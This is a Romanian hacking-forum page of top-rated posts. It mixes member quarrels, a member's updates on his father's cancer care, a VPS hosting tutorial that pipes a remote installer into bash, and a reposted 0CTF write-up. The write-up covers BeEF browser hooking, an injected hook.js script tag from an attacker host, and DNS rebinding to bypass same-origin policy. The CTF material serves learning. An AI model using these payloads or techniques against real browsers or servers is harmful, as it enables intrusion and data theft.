Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/14/16 in all areas

  1. Pe index nu sunt logat/uneori nu recunoaște parola, dar pe forum propriu-zis sunt logat și nu sunt probleme la logare.
    4 points
  2. Bai frate, sunt banat de ceva timp , dar cand ti-am citit postul nu m-am abtinut sa nu-ti dau replica . Cat de ... prost ? incult ? prost crescut ? Nu cred , cel mai probabil egoist , cocalar poti fi ? Acest om , pe care nu-l cunosc , pur si simplu a cerut ajutorul nostru , comunitatii , care e problema ? Nu fura , nu da in cap , daca a cerut ajutorul , ce rau a facut ? In loc sa-l jignesti asa , ai fi putut sa-i spui o vorba buna , dar in nici un caz sa incerci sa ne intorci impotriva lui ( eu unul nu am ajutat cu nimic, dar din cate am citit , sunt mai multi membrii ce l-au ajutat ) . Mai mult ca sigur esti un copil , cu sau fara probleme , imatur , probabil ai sa-ti aduci aminte de cuvintele mele , fiecare dintre noi , o sa-si piarda persoanele dragi , cand le vine vremea , dar , in momentul acela , ai incerca sa ii ajuti cu orice , absolut orice . Prea multe randuri pentru o persoana ca tine , am pierdut 30 de secunde si asta doar din rautate . @alexu Multa sanatate !!!
    3 points
  3. Salut, Am pont de facut bani: munca. Incercati, si dupa 1an veniti sa-mi spuneti daca a functionat.
    3 points
  4. ^ subscriu. Ideea e ca pe index ma pune mereu sa ma loghez. Insa daca dau click pe orice thread / chat / etc, sunt deja logat
    3 points
  5. Date Sun, 13 Mar 2016 21:53:34 -0700 Subject Linux 4.5 From Linus Torvalds <> share 0 share 37 So this is later on a Sunday than my usual schedule, because I just couldn't make up my mind whether I should do another rc8 or not, and kept just waffling about it. In the end, I obviously decided not to, but it could have gone either way. We did have one nasty regression that got fixed yesterday, and the networking pull early in the week was larger than I would have wished for. But the block layer should be all good now, and David went through all his networking commits an extra time just to make me feel comfy about it, so in the end I didn't see any point to making the release cycle any longer than usual. And on the whole, everything here is pretty small. The diffstat looks a bit larger for an xfs fix, because that fix has three cleanup refactoring patches that precedes it. And there's a access type pattern fix in the sound layer that generated lots of noise, but is all very simple in the end. In addition to the above, there's random small fixes all over - shortlog appended for people who want to skim the details as usual. Go test, and obviously with 4.5 released, I'll start the merge window for 4.6. Linus Sursa: https://lkml.org/lkml/2016/3/14/50
    2 points
  6. Cand il banati pe gibonul ala de Sveratus?
    2 points
  7. @Sveratus: Mai lasa-ne coaie cu offtopicul tau si du-te la sapat. Hai, restricted la postat pe-aici pana se indura ceva mod de tine ca mie mi-e scarba de ratati.
    2 points
  8. Te fute grija de forum, de parca ai contribuit cu ceva. Si... da esti prost, prost rau ba!
    2 points
  9. 2 points
  10. @aelius parca il banasi pe pulifricul asta... iar a aparut creatura.. @Sveratus esti mai prost decat prevede legea
    2 points
  11. Mare prost mare om .. daca taicato sau un părinte ar pății asta tu ce chef de munca ai cand afli ca taicato are cancer ... sau daca nu ai terminat inca școlile ?
    2 points
  12. Am primit, astazi, rezultatul tomografiilor: 1, 2 si 3. @Che te-a rugat tata sa-i spui si lui ce scrie pe acolo si ce inseamna ca trebuie sa faca IRM pelvin. Tomografiile astea le iei de la receptie si nu-ti spune nimeni nimic. Abia pe 21 trebuie sa mearga la a patra sedinta de chimio, unde ar mai putea sa afle cate ceva. Tata se simte bine in continuare, mai ales ca deocamdata nu mai ia citostatice, asa cum i-a zis doctorul oncolog. Merci AGSQ pentru ajutor. Mai am achitata in avans inca o luna de hosting (4 euro) deci si aprilie. Daca ma mut la tine, te anunt. Imi pare bine ca nu ai uitat.
    2 points
  13. Ai folosit un dummy account sa incerci fara cel de admin sa vezi daca se repeta problema? E cam enervanta treaba, mai ales de pe mobil/tableta.
    2 points
  14. Ce s-a mai intamplat: A terminat cele 25 de sedinte de radioterapie. Acum trebuie sa faca pauza o luna de zile de la citostatice, deoarece a continuat sa le ia si dupa radioterapie, atunci cand trebuia sa se opreasca si incepuse sa-i fie rau. Daca nu le mai ia, momentan se simte foarte bine. Nu-i mai e rau si este vioi. Luna asta doar fructe, sa mai scape de toxicitatea creata de radioterapie si chimio. Acum trebuie sa faca iar tomografie, insa problema a fost sa-i gasesc un spital unde sa o faca pe asigurare. Am dat zeci de telefoane si mi se spunea ca s-au epuizat fondurile si ca sa fie pus pe lista de asteptare sau sa plateasca. De platit nu se pune problema, mai ales ca trebuie sa faca in patru locuri (cap, plamani, abdomen, pelvis) si ar fi costat prea mult. Pana la urma, i-am gasit pe undeva pe la Baneasa, pe asigurare. Miercuri trebuie sa mergem. Sper sa iasa bine, sa nu se mai fi intins cancerul pe undeva. Va tin la curent cu rezultatul tomografiei. PS: chiar daca s-a retras de pe forum, spiritul lui AGSQ inca este pe aici si ii multumesc pentru ajutor.
    2 points
  15. O multime de membrii au pus intrebari pe forum despre cum sa iti hosteze siteul / blogul pe un vps cumparat de la o firma anume sau acasa pe un pc amarat care il au si sta degeaba. Ei bine a fost un moment cand am trecut si eu prin toate acestea, si am gasit o multime de tutoriale dar se cam bateau cap in cap sau nu erau destul de explicite. La un moment dat am gasit unul si acesta s-a dovedit a fi bun pentru ca m-am jucat cu el de mai multe ori pe mai multe VPS-uri. Voi explica in cele ce urmeaza pas cu pas cum sa iti hostezi site-ul pe un VPS, a se intelege ca acest tutorial ar trebuii sa functioneze si pe pc-ul vostru de acasa. De ce sa hostam site-ul pe un VPS ? Viteza pentru site-ul tau IP Dedicat Full Control Aproape acelasi pret ca si la shared hosting Ca sa va faceti o idee, eu hostez 2 websiteuri ale mele la ovh pe un vps cumparat de la ei la pret de 3 $ / luna care imi da urmatoarele facilitati : 1 vCore 2.4 GHz 2 GB RAM 10 GB SSD Pro si Con-uri sunt sigur ca mai exista insa nu ma pot gandi la tot acum Instalare Sistemului de operare : Presupun ca pana in momentul de fata va-ti achizitionat deja un VPS, daca nu, sunt o multime de site-uri de unde o puteti face, o lista ar fi aici : CompareVPS unde puteti face si anumite comparatii intre planurile ce se ofera, sau puteti lua legatura cu baietii de pe forum, vezi MarketPlace. Recomand ca VPS-ul sa aibe macar 750 Mb Ram ca totul sa functioneze usor si repede, 1 GB ar fi perfect. Pentru cele ce urmeaza asigurate ca ai la indemana : - IP-ul VPS-ului tau - acesta iti este dat dupa ce achizitionezi un VPS - Parola De obicei dupa ce te loghezi pe site-ul de unde ti-ai achizitionat VPS-ul o sa te intrebe ce sistem de operare vrei instalat, fii sigur ca alegi CentOS 6 x86 ca totul sa mearga perfect dupa acest tutorial, pentru alte OS-uri sau versiuni nu promit ca o sa fie la fel. Conectare la VPS Mai exact ne trebuie un client SSH, cel mai cunoscut si utilizat este Putty pe care il vom folosi si noi, poate fi downloadat de aici : http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html Dupa download il vom deschide si ne vom conecta la VPS. La Host Name sau IP Adress vom scrie adresa serverului nostru VPS si vom apasa OPEN. Acum ar trebuii sa vezi o fereastra CLI sau un terminal mai pe romaneste cu textul login as unde va trebuii sa scrii "root" fara ghilimele, apesi ENTER si apoi parola, daca este autogenerata de server, o poti copia, iar paste se face dand click dreapta in terminal. PS: cand tastezi parola nu va arata nimic in terminal, este ceva normal. Instalarea Control Panelului pentru Hosting Stiu ca majoritatea cunoasteti sau ati vazut doar vestitul CPanel insa sunt alternative gratuite care arata exact la fel. Noi ne vom folosi de Sentora (Zpanel) care este gratuit si arata exact la fel ca CPanel. In cele ce urmeaza puteti copia fiecare comanda dand paste in terminal chiar daca nu stiti ce inseamna. Vom incepe intai cu un update al CentOS-ului. yum update Apasati ENTER, dupa cateva secunde va trebuii sa validati comanda si va va cere sa apasati y sau n, intodeauna apasati y daca va cere. yum erase httpd httpd-tools apr apr-util Apasati Enter si din nou validati cu Y cand va cere, exact ca in imaginea de mai sus. yum remove bind Enter si Y cand va cere bash <(curl -L -Ss http://sentora.org/install) La fel, Enter si Y cand va cere. OnScreen Steps Nu e doar de copy/ paste si enter, acum trebuie sa urmati comenzile de pe ecran, adica sa cititi ! Prima data va va pune sa selectati un continent si/sau un ocean Apasati cifra corespunzatoare locatiei voastre si apasati Enter. Dupa acest pas va va intreba care este tara voastra, procedati ca la pasul anterior, selectati cifra dorita si apasati Enter. Apoi va va intreba care este subdomeniul care sa fie instalat in CP : Aici o sa trebuiasca sa treci numele domeniului sau subdomeniului pe care planuiesti sa-l hostezi pe acest VPS, de exemplu subdomeniu.siteulmeu.com si apasati din nou Enter. Apoi va va intreba de IP, aici apasati doar enter pentru ca il va detecta singur sistemul. O sa va atentioneze cum ca nu ati scris nici un IP care sa pointeze catre domeniu, apasati "y" si enter. Dupa toti acesti pasi, asteptam ca totul sa se instaleze si sa se configureze ! Dupa ce se termina de instalat, copiati log-ul (informatiile) si salvati-le intr-un fisier text inainte de a da restart, exact ca in imaginea urmatoare : Daca le-ati copiat, apasati Y pentru restart. Dupa restart daca puneti ip-ul vps-ului vostru in browser, ar trebuii sa va arate interfata de administrare, unde va logati cu datele copiate anterior. Felicitari, tocmai ati instalat un Cpanel. Ridicare Limita Upload php.ini Logati-va pe VPS-ul vostru cu ajutorul lui Putty cum am facut la inceputul acestui tutorial, dupa care trebuie sa va instalati un editor text in linux, va recomand Nano, acest lucru il puteti face cu ajutorul comenzii : yum install nano Apasati ENTER si mai apoi cand va intreaba daca continuati, apasati "Y". Ok, acum poate deveni putin mai complicat, trebuie sa editam fisierul php.ini, executam urmatoare comanda in continuare : nano /etc/php.ini Apasati Enter, apoi tastati CTRL+W acestea le apasati din tastatura, nu le scrieti, unde o sa va apara "Search" si voi o sa scrieti : ”upload_max_filesize” fara ghilimele si dati Enter. In continuare schimbati upload_max_filesize = 2mb in cat doriti, puteti pune 1000mb, desi recomand sa lasati 100, nu cred ca o sa aveti fisiere mai mari de 100 de mb. Cand terminati de editat, apasati CTRL + O si ENTER, apoi CTRL +X si ENTER ca sa esiti. Instalarea unui Manager de Fisiere si a Platformelor (Wordpress, Joomla etc) Logativa din nou in Putty ca si turele precedente si urmati fiecare comanda, apasati enter si "Y" cand vi se cere : zppy repo add zppy-repo.mach-hosting.com zppy update zppy install Monsta_FileManager Acum sa instalam modulele : zppy repo add zppy-repo.mach-hosting.com zppy update zppy install sentastico Acum sa ne logam sa activam modulele, ne logam ca si mai devreme, pe baza ip-ului in browser cu datele copiate mai devreme. Dupa ce va logati, pe dreapta sus, o sa aveti categoria Admin -> Module Admin Aici cautam Monsta File Manager si bifam "Administrators" Tot in aceasta lista cautati si "SENTASTICO" si la fel bifati "Administrators" apoi va duceti jos si dati SAVE CHANGES!Daca ai terminat, hai sa ne ocupam de un client FTP.Din pagina principala a CPanelului (adica apasam butonul HOME din meniul de sus), mergem pe FTP Accounts (e mai jos, pe stanga). Aici o sa trebuiasca sa creem un user si o parola. Salvati-le si intr-un fisier text dupa ce le completati, pentru orice eventualitate. ! La acces type selectati FULL ACCES, iar la Home Directory, trebuie sa bifati Set Mater Home Directory. Asta e tot, avem instalat tot ce ne trebuie pentru a ne apuca de hostat site-uri. Cum hostam un Website Pentru acest lucru aveti nevoie bineinteles de UN DOMENIU ! Daca il aveti deja, mergem din Cpanel in categoria Domain Management -> Domains, scrieti numele domeniului vostru cu tot cu extensie (ex: .com, .ro) si apasati CREATE ! Acum va trebuii sa ne ocupam de DNS-uri. Din meniul principal mergem la Management> DNS management, aici iti selectezi domeniul creat anterior si apasam EDIT. In meniul urmator ce ne va aparea vom apasa singura optiune disponibila si anume CREATE RECORDS. In urmatoarea fereastra, ne ducem pe NS-uri, exact ca in imagine : Default, nameserverele vor fi NS1.domeniu.com si NS2.domeniu.com, acestea va trebuii sa le schimbati manual. Adica mergeti pe siteul de unde va-ti achizitionat domeniul si in categoria NameServers va editati acelea in functie de ip-ul dvs. faceti la fel pentru ns1 cat si pentru NS2. Dupa ce le schimbati pe site le schimbati si in categoria NS din Cpanel. Propagarea poate dura pana la 48 de ore. Dupa ce schimbati acestea, sunteti gata, mergeti in Cpanel si din meniul principal, intram in Sentastico sa ne instalam ce ne trebuie : Felicitari !!! Puteti hosta site-uri cat va duce hardware-ul. Scuzati eventualele greseli. Numai Bine.
    1 point
  16. Salut baieti! Ma uitam la xfactor si am vazut un baiat care a lucrat ca ospatar, avea baiatu o voce ca a lasat juriu fara cuvinte.. baiatul asta sigur poate si merita mai mult. In aceasi situatie ma gandesc , ca se afla si unii baieti de pe rst. In principal conteaza determinarea, degeaba ai skilluri daca nu vrei sa le folositi. Toti au impresia ca banii online se castiga usor, aud des aluzii de la prieteni: "la cat muncesti tu pentru bani.. " , "normal ca ai nevoie de relaxare... tot te rupi (la modul ironic, mai mult sub forma unei glumite nevinovate)", etc.. le aud atat de des incat deja ma irita uneori. Doar eu stiu cand trageam de mine la inceput 16 din 24 7 din 7, erau zile cand nu castigam un cent, eram in stadiul de research, sa imi fac o idee de ansamblu. Spre deosebire de un job ,acolo faci cat ti se cere, cand pleci acasa, esti nepasator, unii chiar si in timpul serviciului isi permit sa fie implicati doar 50%, dar daca vrei sa reusesti singur trebuie sa fie implicat nu 50% nu 70% , trebuie sa fie implicat 100%, sa iti pese de fiecare detaliu, ca daca tie nu iti pasa nu o sa ii pese nimanui, trebuie sa fi un perfectionist. Daca sunt doritori va astept, imi rezerv dreptul sa imi aleg persoanele cu care lucrez si cat timp aloc fiecarei persoane.
    1 point
  17. Aici e treaba http://thenextweb.com/insider/2016/03/14/one-of-the-worlds-most-notorious-hackers-just-revealed-his-identity-to-me/ Daca e adevarat... good luck fatso, prepare your anus for action!
    1 point
  18. 0CTF 2016 Write Up: Monkey (Web 4) The Chinese 0CTF took place on March 12-13 and it was yet another fun CTF. I played with my teammates from TheGoonies and we were ranked #48. I found the Web task "Monkey" particularly interesting: I solved it with the help from my friend@danilonc, but it took way longer than it should because of some **Spoiler Alert** DNS glitches. According to the scoreboard status, approximately 35 teams were able to solve it. Task: Monkey (Web - 4pts) What is Same Origin Policy? you can test this problem on your local machine http://202.120.7.200 The running application receives a Proof-of-Work string and an arbitrary URL, instructing a "monkey" to browse the inputted URL for 2 minutes. Proof-of-Work Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars from its MD5 against the challenge. The POW challenge was more cpu-intensive than normal, so the traditional bash/python one-liner ctf scripts would require some performance improvements. @danilonc had written a quick hack using Go to bruteforce and solve POW from older CTF challs, so we just slightly modified it: package main import ( "fmt" "os" "crypto/md5" "math/rand" "time" "encoding/hex" "strings" ) var letters = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789=/+") func randSeq(n int) string { b := make([]rune, n) for i := range b { b = letters[rand.Intn(len(letters))] } return string(b) } func main() { //warning - don't try this at home //OWASP kills a panda every time you seed random with timepstamps rand.Seed(time.Now().UnixNano()) //argument from cmdline prefix := os.Args[1] //generate md5 from random strings for { attemp := randSeq(8) hash := md5.New() hash.Write([]byte(attemp)) hashString := hex.EncodeToString(hash.Sum(nil)) //compare the cmdline input with the md5 prefix if strings.HasPrefix(hashString,prefix){ fmt.Printf("%s\n",attemp) break } } } view rawpow.go hosted with ❤ by GitHub Solving the Proof-of-Work: Same-Origin-Policy and CORS The Same-Origin-Policy (SOP) deems pages having the same URI scheme, hostname and port as residing at the same-origin. If any of these three attributes varies, the resource is in a different origin. Hence, if provided resources come from the same hostname, scheme and port, they can interact without restriction. If you try to use an XMLHttpRequest to send a request to a different origin, you can’t read the response. However, the request will still arrive at its destination. This policy prevents a malicious script on one page from obtaining access to sensitive data (both the header and the body) on another web page, on a different origin. For this particular CTF challenge, if the secret internal webpage had had an insecure CORS header like this "Access-Control-Allow-Origin: *", we would be able to retrieve its data with no effort. This, of course, was not the case. Bypassing the Same-Origin The flag was accessible on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hooking the monkey's browser using BeEF, so we could fingerprint his device, platform, plugins and components. There was nothing interesting here, a custom user-agent and no known vulnerable component. We enumerated the chars accepted by the server with the following script: #!/bin/bash for (( j=0 ; j<=0xFF ; j++ )) ; do i=$(printf '%%%X\n' $j) echo -n "$i"" " page=$(curl -s -D - http://202.120.7.200) session=$(echo "$page" | grep Cookie | cut -d" " -f2 | cut -d";" -f1) challenge=$(echo $page | grep substr | cut -d\' -f2) string=$(go run pow.go "$challenge") curl -i -s -k -X 'POST' \ -b "$session" \ --data-binary $"task="$string"&url="$i"" \ 'http://202.120.7.200/run.php' | tail -n1 echo done view rawtest-chars.sh hosted with ❤ by GitHub Unfortunately, the server was rejecting special chars like spaces (%20 and +) and there was no command injection signal. Our evil plan to input --disable-web-security $URL to disable Chrome's SOP didn't work so we had to find new ways to retrieve the secrets. We also thought about using data:uri and file schemes to load a malicious script/webpage, but it wouldn't help us to bypass the SOP. We tried to input URL's like <html><script/**/src='http://www.example.com:8000/hook.js'></script></html> andfile:///proc/self/environ (setting custom headers with a malicious HTML), but that is also known not to work on modern browsers. DNS Rebinding After some discussion, we came to the conclusion that we needed to perform a DNS Rebinding attack.devttys0 presented about this class of vulnerabilities at DEFCON 18 and @mikispag recently wrote a detailed post describing how to use DNS rebinding to steal WiFi passwords. DNS rebinding is a technique that can be used to perform a breach of same-origin restrictions, enabling a malicious website to interact with a different domain. The possibility of this attack arises because the segregations in the SOP are based primarily on domain name and port, whereas the ultimate delivery of HTTP requests involves converting domain names into IP addresses. We had some issues at first because we tried to use the free DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to hook the user's browser when using the service. In order to make our life miserable, the challenge monkey would browse the site for two minutes only: we also could't use the DNS services from Namecheap because the minimum TTL time is 60 seconds. Attack Phase After deciding to set up the DNS server on our own, we came with the following attack scenario: 1) User visits the beef hook page at http://ctf.example.com:8080 (IP 1.2.3.4). 2) Webpage will load BeEF javascript hook and his browser will become a zombie. 3) We perform a DNS Rebind to change the A Record from 1.2.3.4 to 127.0.0.1. @danilonc set the BIND Zone file with a low TTL (1 sec) and replaced the answer (lines 14-15) as soon as the browser got hooked. 4) Perform a CORS request using BeeF's "Test CORS Request" module. Here's a small diagram of the attack: After a couple of tries we finally managed to get the flag: Flag: 0ctf{monkey_likes_banananananananaaaa} Posted by Bernardo Rodrigues at 9:01 PM Sursa: https://w00tsec.blogspot.ro/2016/03/0ctf-2016-write-up-monkey-web-4.html
    1 point
  19. ,,,tot din capace , o antena MiMo 2,442 GHz...
    1 point
  20. OpenCart 2.0+, iar tema se numeste Journal versiunea 2.6.7, daca vrei, iti pot da tema.
    1 point
  21. PowerMemory Exploit the credentials present in files and memory Link: https://github.com/giMini/PowerMemory
    1 point
  22. Ultimul e bazat pe Dynamicweb CMS .
    1 point
  23. Salut, De atunci a trecut ceva timp, am mai scris un topic dar cand s-a facut upgradeul a disparut. Merge foarte bine, m-am extins, si am trecut si la wholesale. Pentru cei care vor sa aduca din China produse acum dar cauta si plata cu paypal + shipping ok, m-am descurcat foarte bine la un moment dat cu dinodirect. Numai Bine!
    1 point
  24. Opencart - si tema cu cele 10 interfete se cheama Journal
    1 point
  25. Atata timp cat site-urile unde scrii articolele sunt bine vazute (nu mai trebuie sa detaliez,presupunand ca sti ce inseamna asta) + ca folosesti anchor si text in romana ,nu vad de ce nu ar ajuta . Eu zic ca este ok ,rankarea nu se face doar punct pe punct nisa pe nisa limba/limba . Continutul,calitatea site-ului + altele conteaza .
    1 point
  26. Tot sunt sterse de pe hosturi. Ia luati de pe DropBox : https://www.dropbox.com/sh/arq4a7fuqsl4cck/AABw8VnT05wEWKTDZgdU3jK0a?dl=0 @gipsy @VladX
    1 point
  27. Ce cacat de stire mai e si asta? Nici macar nu ai stat sa formatezi textu ca lumea.
    0 points
  28. Salutare , cine stie ce platforma e asta e custom sau este un care exista , sau cu care seamana mult mai bine multumesc frumos admin Ș
    -1 points
  29. In loc de copypaste pune linkul daca totusi vrei sa pui copypaste pune o descriere mai scurta sau tradusa
    -1 points
  30. -1 points
  31. Unul dintre cei mai căutați hackeri din lume și-a dezvăluit identitatea. Este român Sursa: http://www.activenews.ro/stiri/Unul-dintre-cei-mai-cautati-hackeri-din-lume-si-a-dezvaluit-identitatea.-Este-roman-131092
    -2 points
  32. Eu va spun ca nu o sa mai scapati de milogi astia spammeri daca nu inchideti postariile astea de milogii si sai banatii , adica ce plm tiai gasit aici sa ceri bitcoin pt tactu duteb plm la munca si intretinel tu sti cati mortii mati au cancer in tara asta?
    -7 points
×
×
  • Create New...